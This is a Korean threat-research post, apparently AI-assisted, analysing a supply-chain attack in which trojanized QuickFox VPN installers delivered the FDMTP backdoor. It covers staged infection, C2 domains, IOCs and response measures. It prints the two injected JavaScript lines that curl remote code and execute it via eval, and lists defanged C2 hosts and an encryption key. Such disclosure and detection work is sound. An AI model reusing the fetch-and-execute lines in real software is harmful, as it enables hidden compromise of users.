서론
FortiGuard Labs는 2026년 8월 5일, QuickFox VPN 애플리케이션에 대한 장기 지속 공급망 공격을 공개했다. 2025년 8월부터 활동해 온 이 공격은 QuickFox 설치파일을 변조해 FDMTP라는 백도어를 배포했으며, 중국 국가 지원 위협 행위자 Mustang Panda와 전술적 연관성이 있는 것으로 분석되었다. QuickFox는 해외 체류 중국인을 주로 표적으로 삼는 VPN과 네트워크 가속 도구로, 해외 학생과 해외 교민이 주요 사용자층이다.
이 공격이 주목받는 이유는 단순한 설치파일 변조를 넘어 정교한 엔드포인트 프로파일링 기반 선택적 감염 메커니즘, DLL 사이드 로딩과 .NET 오버레이를 통한 탐지 회피, 그리고 FDMTP라는 고급 APT 도구의 공급망 배포가 결합되어 있기 때문이다. 또한 공격 기간 동안 2단계 페이로드는 2개 세대로 진화하며 AES-128-ECB 암호화, JieJie .NET Protector 오버레이 등 생존 능력을 지속적으로 향상시켰다.
이 글은 QuickFox 공급망 공격의 전모를 기술적으로 분석하고, 조직이 즉각 취해야 할 대응 조치와 장기적 공급망 보안 강화를 위한 전략을 제시한다.
본론
영향 범위
QuickFox는 중국 해외 교민과 유학생이 주로 사용하는 VPN과 게임 가속 도구이다. 이 애플리케이션은 중국 기반 리소스에 대한 접근 속도를 높이고, 온라인 게임 사용자 경험을 개선하는 데 널리 사용된다. 공격은 Windows 버전의 QuickFox installer만 표적으로 했으며, iOS와 Android 버전에는 악성 구성요소가 발견되지 않았다. macOS 버전에는 변조된 index.html이 일부 빌드에 포함되어 있었으나, 초기 JavaScript의 실행 가드레일(Windows 전용 제한)로 인해 감염이 진행되지 않았다.
영향된 버전
공격이 도입된 시점은 2025년 7월 25일과 8월 13일 사이로 추정된다. FortiGuard Labs가 확보한 가장 초기의 영향을 받은 버전은 Windows 3.0.51.0이며, 이후 3.52.0, 3.55.0, 3.55.5, 3.59.3, 3.59.5 등 여러 버전이 감염된 상태로 확인되었다. Fortinet의 책임 있는 보고를 받은 후 QuickFox는 v3.59.6부터 악성 구성요소를 제거했다.
표적 프로파일
공격자는 선택적 감염을 위해 26개 이상의 특정 프로세스 이름을 확인했으며, 이는 다음과 같은 환경의 사용자를 표적했음을 시사한다:
- 원격 서버 관리 도구: Xshell, MobaXterm, FinalShell, Tabby Terminal
- 데이터베이스 관리 도구: Navicat, DBeaver
- 개발 도구: Git, IntelliJ IDEA, VS Code, Sublime Text, Notepad++
- 암호화폐지갑: Exodus, Binance Desktop, Ledger Live, Trezor Suite
- 중국어 번역/크로스보더 e커머스 도구: Ai Fanyi, Haiwang Chuhai, Yi Fanyi 등
- 통신: Telegram, SafeW
반면 Steam이 실행 중이면 감염을 중단하는 가드레일도 확인되었다. 이는 게임용 컴퓨터가 아닌 기업 환경이나 업무용 시스템을 표적으로 했음을 시사한다.
고위험 환경
- 해외 체류 중국인 및 유학생 환경
- 중국어 번역/크로스보더 e커머스 관련 프로페셔널 환경
- 암호화폐 관련 업무 환경
- 개발/IT 운영 환경
- SSH/원격 관리 도구 사용 환경
기술적 분석
QuickFox 공급망 공격은 정교한 다단계 감염 체인을 지닌다.
1단계: 변조된 QuickFox 설치파일
공격자는 QuickFox installer 실행파일에 단일 HTML 파일의 두 줄의 JavaScript만 추가해 악성코드를 주입했다. 이 HTML 파일은 QuickFox installer 실행파일 내에 내장된 7z 아카이브의 resources\app.asar\candy\core\service\index.html 경로에 위치하며, QuickFox 애플리케이션 초기화 시 Electron 렌더러에서 실행된다.
// 변조된 index.html (두 줄 추가)
eval(require("child_process").execSync('curl http://cdns3[.]51quickfox[.]cn/firebase-app-compat.js'));
eval(require("child_process").execSync('curl http://cdns3[.]51quickfox[.]cn/firebase-analytics-compat.js'));
두 줄 모두 cdns3[.]51quickfox[.]cn 도메인에서 JavaScript 파일을 다운로드해 실행한다. 이 도메인은 legitimate QuickFox 도메인 51quickfox[.]com의 타입스쿼팅(타입 닮기)으로, .com TLD를 .cn으로 대체했다. 도메인 등록일은 2025년 6월 9일이며, 등록자는 '林天俊 (Lin Tianjun)'이고, 리저러는 말레이시아의 Web Commerce Communications Ltd, DNS는 Cloudflare이다.
2단계: JavaScript 로더와 엔드포인트 프로파일링
다운로드된 두 파일 중 firebase-analytics-compat.js는 legitimate Google Firebase 코드를 포함하며, firebase-app-compat.js는 중대한 오버레이를 적용한 악성 코드이다. 이 파일은 legitimate Firebase SDK 코드를 가시하지만, 내부에는 다음 기능이 숨겨져 있다:
- 고도 오버레이: r1muVuL 랩퍼 함수(정적 분석 회피), 10개 병렬 레이어의 base91 복호화(각 레이어마다 고유한 91자 알파벳), 캐시된 문자열 테이블을 통한 문자열 분해, 중첩 switch 문 흐름 오버레이
- Windows 검증: Windows 환경인지 확인
- 중복 감염 방지: C2 서버와 통신해 이미 감염되었는지 확인
- 프로세스 프로파일링: tasklist 명령을 통해 실행 중인 프로세스 목록을 확인
- 가드레일 검증: Steam 실행 시 중단, 26개 프로세스 중 최소 1개 확인 시 진행
이 프로세스 검증은 QuickFox 자식 프로세스 하위에서 cmd.exe를 통해 실행되며, EDR 기술에서 매우 소음이 많은 프로세스 트리를 생성한다. Electron 애플리케이션 설계상 QuickFX.exe 자식 프로세스가 다수 생성되는 것은 악성 행위 자체가 아니므로, 감시 시 이 점을 주의해야 한다.
3단계: DLL 사이드 로딩을 통한 FDMTP 배포
프로세스 검증이 성공하면 update.zip이 다운로드되며 %TEMP%\quickfox\update.zip에 저장된다. FortiGuard Labs는 최소 2개 세대의 update.zip 페이로드를 확인했다:
제1세대 (2025년 9월부터)
- csmonitor.exe: legitimate Microsoft 'Windows Azure Compute and Storage Emulator' 바이너리
- Microsoft.ServiceHosting.Tools.dll: 변조된 Microsoft Azure SDK로, 파일 내에 FDMTP 페이로드가 임베딩됨
- SHA-256: 2B6CDAFDFE427A3DE1A94A8A2CA1F09FC4C8F90E4F59089FD9B35B73185ED01C
제2세대 (2026년 5월부터)
- csmonitor.exe: 동일
- Microsoft.ServiceHosting.Tools.dll: JieJie .NET Protector로 오버레이된 커스텀 로더로, update.bin의 FDMTP 페이로드를 복호화해 실행
- SHA-256: 795594AD5E6F2868CC4D8ED12DABF4F3999A1477C6B250527C5EDE9A98528FB9
- update.bin: AES-128-ECB 암호화된 FDMTP 페이로드 (공유 하드코딩 키: POt_L[Bsh0=+@0a.)
제2세대에서 사용한 AES-128-ECB 해독키는 Darktrace가 지난 FDMTP 캠페인에서 보고한 동일한 키와 일치한다.
4단계: FDMTP 임플란트 구조
FDMTP(Client.dll)는 리소스 섹션에 15개 압축된 모듈을 포함하며, Costura.AssemblyLoader.ResolveAssembly()를 통해 'Assembly Resolve' 이벤트가 발생 시 해당 모듈을 분해해 로딩한다. 이 기능은 정적 분석 방법의 효과성을 약화시킨다.
15개 모듈 중 FDMTP 페이로드 실행을 조정하는 주요 모듈은 Client.FDMTPFrame.dll이며, 실행 시 C2 연결을 시도한다.
5단계: C2 인프라와 무작위화
FDMTP는 Client.Program.InitConnect() 메서드를 통해 다음 C2 연결을 시도하며:
- CommonService와 PluginService RPC 서버를 정의
- FileTransferPlugin, SystemEventsPlugin, ActiveWindowPlugin 세 가지 플러그인을 정의
- C2 도메인으로 GET /GetCluster?protocol=DotNet-TcpFDMTP&tag= API 요청
이 캠페인과 관련된 C2 스테이징 도메인은 다음과 같으며, 최소 3개가 QuickFox에 통보 당시까지도 활성화된 상태로 확인되었다:
| 도메인 | 첫 관찰 | 마지막 관찰 |
|---|---|---|
www[.]yahoo-cdn[.]it[.]com |
2026-02-13 | 2026-06-19 |
www[.]google-apis[.]net |
2026-01-18 | 2026-06-30 |
www[.]icloud-cdn[.]net |
2025-11-17 | 2026-06-30 |
www[.]wangmeng[.]xyz |
2025-11-19 | 2026-06-19 |
www[.]wangmengsb[.]com |
2026-06-16 | 2026-06-16 |
www[.]wangmeng66[.]top |
2026-06-16 | — |
API 함수 이름도 GetSlaver, GetGateways, GetEndpoints, GetServers, GetHosts, GetNodes 등으로 주기적으로 변경되어 탐지를 회피한다.
6단계: FDMTP 기능
C2 연결 후 GetInfo 요청을 통해 다음 정보를 수집한다:
- 가장 위에 떠 있는 프로그램의 윈도우 제목
- 설치된 백신 프로그램 목록
- .NET Framework 실행 버전
- 네트워크 및 운영체제 정보
- 현재 사용자 이름
- 임플란트 자체 정보 (파일 전체 경로, 버전, 프로세스 ID, 호스팅 프로세스명)
추가로 실행 중인 프로세스 목록을 요청해 엔드포인트를 추가로 필터링하며, 서버에서 플러그인을 로드해 공격자의 기능 확장이 가능하도록 한다. 2026년 초 Darktrace의 보고서에 따르면 스케줄 작업 관리, 레지스트리 지속성, 원격 파일/명령 다운로드 등의 기능이 포함된다.
7단계: IOC (감시 지표)
| 지표 | 설명 |
|---|---|
cdns3[.]51quickfox[.]cn |
변조된 QuickFox CDN (타입스쿼팅) |
www[.]yahoo-cdn[.]it[.]com |
FDMTP C2 스테이징 도메인 |
www[.]google-apis[.]net |
FDMTP C2 스테이징 도메인 |
www[.]icloud-cdn[.]net |
FDMTP C2 스테이징 도메인 |
www[.]wangmeng[.]xyz |
FDMTP C2 스테이징 도메인 |
www[.]wangmengsb[.]com |
FDMTP C2 스테이징 도메인 |
www[.]wangmeng66[.]top |
FDMTP C2 스테이징 도메인 |
2B6CDAFDFE427A3DE1A94A8A2CA1F09FC4C8F90E4F59089FD9B35B73185ED01C |
제1세대 Microsoft.ServiceHosting.Tools.dll SHA-256 |
795594AD5E6F2868CC4D8ED12DABF4F3999A1477C6B250527C5EDE9A98528FB9 |
제2세대 Microsoft.ServiceHosting.Tools.dll SHA-256 |
%TEMP%\quickfox\update.zip |
2단계 페이로드 저장 경로 |
%APPDATA%\Local\Temp\quickfox\updated\data.dat |
파일 기반 뮤텍스 (중복 감염 방지) |
resources\app.asar\candy\core\service\index.html |
변조된 HTML 파일 경로 |
POt_L[Bsh0=+@0a. |
AES-128-ECB 암호화 키 (제2세대) |
8단계: 탐지 시그널
- FortiGuard: QuickFox.FDMTP.1 (Trojan) — 변조된 QuickFox installer
- FortiGuard: QuickFox.FDMTP.2 (Trojan) — FDMTP 임플란트
- EDR 시그널: csmonitor.exe + Microsoft.ServiceHosting.Tools.dll 조합
- EDR 시그널: Electron 자식 프로세스에서 cmd.exe → tasklist → curl/chains 호출
- 네트워크: cdns3[.]51quickfox[.]cn와의 통신
- 네트워크: FDMTP C2 도메인과 DotNet-TcpFDMTP 프로토콜 통신
- 파일 시스템:
%APPDATA%\Local\Temp\quickfox\디렉토리 생성
대응 방안
즉시 대응 (24시간 이내)
- QuickFox 제거: QuickFox를 사용 중인 모든 Windows 시스템에서 QuickFox를 제거한다. v3.59.6 이상으로 업데이트하는 것이 아니라 완전히 제거하는 것이 안전하다.
- 변조 구성요소 확인: 시스템에서 다음 파일이 있는지 확인한다.
%TEMP%\quickfox\update.zip%APPDATA%\Local\Temp\quickfox\updated\%APPDATA%\Local\Temp\quickfox\updated\data.dat%APPDATA%\Local\Temp\quickfox\updated\csmonitor.exe%APPDATA%\Local\Temp\quickfox\updated\Microsoft.ServiceHosting.Tools.dll- C2 통신 감시: 다음 도메인과 통신 기록이 있는지 감시한다.
cdns3[.]51quickfox[.]cnwww[.]yahoo-cdn[.]it[.]com,www[.]google-apis[.]net,www[.]icloud-cdn[.]net,www[.]wangmeng[.]xyz,www[.]wangmengsb[.]com,www[.]wangmeng66[.]top- 프로세스 프로파일링 검증: 시스템의 실행 중인 프로세스 목록에서 Steam 실행 여부, 26개 표적 프로세스 확인을 통해 감염 여부를 판단한다.
- 파일 해시 검증: 위에서 제시된 SHA-256 해시와 일치하는 파일이 시스템에 있는지 확인한다.
단기 대응 (1주 이내)
- 대체 VPN 도구 검토: QuickFox를 대체할 legitimate VPN 도구를 검토하고, 대체 도구의 공급망 무결성을 검증한다.
- EDR 규칙 추가: csmonitor.exe + Microsoft.ServiceHosting.Tools.dll 조합, Electron 자식 프로세스에서 cmd.exe 호출 패턴, DotNet-TcpFDMTP 프로토콜 통신을 탐지하는 EDR 규칙을 추가한다.
- 네트워크 감시 강화: FDMTP C2 도메인에 대한 DNS 요청과 HTTP 트래픽을 모니터링하고, 차단 규칙을 적용한다.
- Electron 앱 검증: 조직에서 사용하는 Electron 기반 애플리케이션의 공급망 무결성을 검증한다. 특히 installer의 아카이브 내부 파일과 서명, 해시를 검증한다.
장기 대응 (1개월 이내)
- 소프트웨어 빌드 무결성 검증: 빌드 파이프라인에 코드 서명, 해시 검증, 빌드 환경 격리 정책을 도입하고, 변조된 빌드가 배포되지 않도록 통제한다.
- 공급망 보안 평가: 조직에서 사용하는 외부 소프트웨어 공급망의 보안 성숙도를 평가하고, 공급망 보안 기준을 정의한다.
- Electron 앱 보안 가이드라인: Electron 기반 앱 개발 시 renderer 프로세스 권한 최소화, child_process 호출 제한, 서명 검증, CSP 적용 등의 보안 가이드라인을 정의한다.
- APT 모니터링: Mustang Panda/FDMTP 관련 활동과 C2 인프라에 대한 지속적인 모니터링을 수립하고, 관련 IOC를 정기적으로 업데이트한다.
결론
QuickFox 공급망 공격은 단순한 설치파일 변조를 넘어 정교한 엔드포인트 프로파일링, DLL 사이드 로딩, .NET 오버레이, FDMTP라는 고급 APT 도구가 결합된 종합적인 공격 체인이다. 공격은 2025년 8월부터 2026년 6월까지 지속되었으며, 이 기간 동안 제1세대와 제2세대의 페이로드로 진화하며 생존 능력을 향상시켰다.
특히 Steam 실행 시 감염을 중단하고 26개 프로세스 중 최소 1개 확인 시 진행하는 선택적 감염 메커니즘은 게임용 컴퓨터가 아닌 기업 환경이나 업무용 시스템을 표적으로 했음을 시사한다. 또한 cdns3[.]51quickfox[.]cn와 같은 legitimate 도메인의 타입스쿼팅, JieJie .NET Protector 오버레이, FDMTP C2의 무작위화 API, AES-128-ECB 암호화 등 여러 탐지 회피 기법이 적용된 점에 주목해야 한다.
조직은 QuickFox 사용 중지를 즉시 검토하고, EDR 규칙 추가와 대체 VPN 도구 검토로 단기 대응을 강화한다. 장기적으로는 빌드 무결성 검증, 공급망 보안 평가, APT 모니터링 등을 통해 전반적인 공급망 방어 체계를 강화해야 한다.
참고문헌
-
Fortinet FortiGuard Labs — QuickFox Supply Chain Attack Used to Deploy FDMTP Implant
https://www.fortinet.com/blog/threat-research/quickfox-supply-chain-attack-used-to-deploy-fdmtp-implant -
The Hacker News — QuickFox Supply Chain Attack Delivers FDMTP Backdoor via Trojanized Windows Installer
https://thehackernews.com/2026/08/quickfox-supply-chain-attack-delivers.html -
Darktrace — Chinese APT Campaign Targets Entities with Updated FDMTP Backdoor
https://www.darktrace.com/blog/chinese-apt-campaign-targets-entities-with-updated-fdmtp-backdoor -
PCMag — Suspected Chinese Hackers Compromised This VPN to Deliver Malware
https://www.pcmag.com/news/suspected-chinese-hackers-compromised-this-vpn-to-deliver-malware -
SecNews — QuickFox: Supply Chain attack with FDMTP Backdoor
https://www.secnews.gr/en/725475/quickfox-supply-chain-epithesi-fdmtp-backdoor/ -
SC Media — QuickFox VPN targeted in long-standing supply chain attack delivering FDMTP backdoor
https://www.scworld.com/brief/quickfox-vpn-targeted-in-long-standing-supply-chain-attack-delivering-fdmtp-backdoor -
ChinaPulse — QuickFox Supply Chain Attack Delivers FDMTP Backdoor Through Trojanized Windows Installer
https://www.chinapulse.com/data-news/2026/08/05/quickfox-supply-chain-attack-delivers-fdmtp-backdoor-through-trojanized-windows-installer/ -
Trend Micro — Mustang Panda Deploys Advanced Malware to Target Chinese Nationals Abroad
https://thehackernews.com/2024/09/mustang-panda-deploys-advanced-malware.html
본 콘텐츠는 AI 기술로 작성된 분석 리포트를 포함하고 있습니다. 내용 중 사실과 다르거나 보완이 필요한 정보를 발견하셨으면 댓글을 통해 의견을 부탁드립니다. 여러분의 피드백은 더 정확한 보안 정보 공유에 큰 도움이 됩니다.
댓글 (0)
댓글을 작성하려면 로그인이 필요합니다.
로그인아직 댓글이 없습니다.
첫 번째 댓글을 작성해보세요!